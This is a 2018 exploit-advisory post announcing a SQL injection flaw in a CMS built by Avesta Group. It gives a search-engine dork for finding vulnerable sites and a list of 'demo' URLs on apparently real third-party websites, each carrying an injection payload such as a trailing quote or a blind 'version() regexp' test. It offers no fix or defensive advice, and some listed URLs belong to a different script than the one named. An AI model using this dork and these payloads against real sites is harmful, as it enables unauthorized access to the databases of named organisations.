facebook facebook twitter rss

Developed by Avesta Group CMS SQL Injection Vulnerability

Author: Rednofozi , Published: 15-10-2018
|--------------------------------------------------------------|
|[+] Exploit Title: Developed by Avesta Group CMS SQL Injection Vulnerability
|[+] Date:13/10/2018
|[+] Exploit Author :Rednofozi
|[+] Tested on: : Windows 10 , parrot os
|[+] Vendor Homepage: http://avestagroup.net/
|[+] dork:intext:Developed by Avesta Group & inurl:Direje.aspx?Jimare= & inurl:Content.aspx?LinkID=
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|[+] fb.me :https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------|
|[+] RHG hackers iran team
|[+] Credits : Rednofozi
|[+] Vulnerability Type : SQL Injection Vulnerability
|[+] Severity Level : High

***************************************************************|
demos :
#http://rojnews.net/Content.aspx?LinkID=16'
#http://cpolicesul.com:80/gshty.aspx?Babet=news'
#http://www.xendan.org/arabic/Video.aspx?=hewal&jmara=%Inject_Here%13982
#http://naliagroup.com/kurdcity/Direje.aspx?Jimare=1%27
#http://zhyanawe.com:80/Dreje_hewal.aspx?Cor=Kurdistani&Jimare=2348'
#http://ieku.org/details_ku.aspx?jimare=303%27
# http://www.flweb.com.tw/exec/msg.php?mid=1&cid=3 and(version() regexp CHAR/**/(94, 53))&mod=show&pid=13&lg=T
# http://www.kmfsports.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.dacosemi.com.tw/exec/msg.php?mid=4&cid=4%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.ckoptics.com/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg&lg=E
# http://www.rato.tw/exec/msg.php?mid=6&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=6&lg=E
# http://www.stingray.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.nuzon.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.cyelectronic.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.tongson.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.lampweb.com.tw/exec/msg.php?mid=3&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=E
# http://www.songjin.com.tw/exec/msg.php?mid=2&cid=2%20and(version()%20regexp%20CHAR/**/(94,%2053))&lg=T
# http://www.chiemei.com/exec/msg.php?lg=E&mid=14&cid=3%20and(version()%20regexp%20CHAR/**/(94,%2053))
# http://www.ygget.com/exec/msg.php?off=1&mid=36&cid=18%20and(version()%20regexp%20CHAR/**/(94,%2053))&pid=18&lg=S
|--------------------------------------------------------------|
my name is Inj3ct0r Red Hat's hackers
**********************************************************************

Discovered by : Rednofozi RGH team hackers

Thanks To: ReZa CLONER , Moeein Seven. Rednofozi

Like us on Facebook :